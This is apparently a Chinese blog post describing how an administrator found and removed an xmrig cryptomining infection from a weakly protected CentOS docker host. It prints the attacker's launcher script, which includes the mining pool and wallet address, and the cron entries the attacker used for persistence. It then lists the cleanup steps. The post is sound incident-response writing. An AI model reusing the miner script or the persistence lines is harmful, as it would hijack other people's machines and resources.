彻底清除Centos xmrig木马(普通用户情况)
文章目录一、排查:二、解决三、后序情况:开发同事报update用户连接不上系统,故此上服务器查看由于是docker建立的系统没怎么在意安全,密码设置很简单一、排查:# su - update发现密码已经错误# top
//可以看见CPU平均22点几,占用率更是高达1471%。
//还有update用户启的3个sh
# kill -9 pid //杀掉了又会冒出来
# crontab -l //并不是我自己的,于是根据设置的路径去到对应目录
@daily /var/tmp/1
@reboot /var/tmp/run > /dev/null 2>&1 & disown
@monthly /var/tmp/run > /dev/null 2>&1 & disown
# ls /var/tmp //有一个可执行文件,打开文件查看,不清楚具体的意思,但根据查网上资料,可以肯定是一个挖矿的程序
1
#!/bin/bash
#made by Maz4id#1363
locatie=$(cat /var/tmp/.logs/.local)
if ! pgrep -x xmrig >/dev/null; then
$locatie/./xmrig -o pool.supportxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoL1V1P367MKSzjNZj --donate-level 0 -p xmrig > /dev/null 2>&1 & disown $*
else
:
fi
二、解决
因为每次都杀不掉,所以需要找到xmrig命令,查看update家目录和/tmp,/var/tmp下的文件
# find . -name xmrig //在这个隐藏目录下->...
/var/tmp/.../xmrig
# ls //有几个脚本和二进制命令文件,将这几个改名或者删除
a haiduc nohup.out pgrep xmrig
# crontab -e //删除执行的计划任务
# top //杀掉所起的进程
# kill -9 pid
//发现另外3个sh进程还在运行,也找出进程号杀掉
三、后序
修改防火墙策略,以后会更加注重安装,不再因为是docker而忽略,幸好不是破解root用户,不然就可以为所欲为了。
贴几个参考链接,感谢。
参考链接1
参考链接2
最后有一个疑问,就是普通用户是怎么写进root里面的crontab计划任务里面。知道的兄弟留言一下
权威|前沿|技术|干货|国内首个API全生命周期开发者社区
更多推荐
2
0- 0
已为社区贡献1条内容
所有评论(0)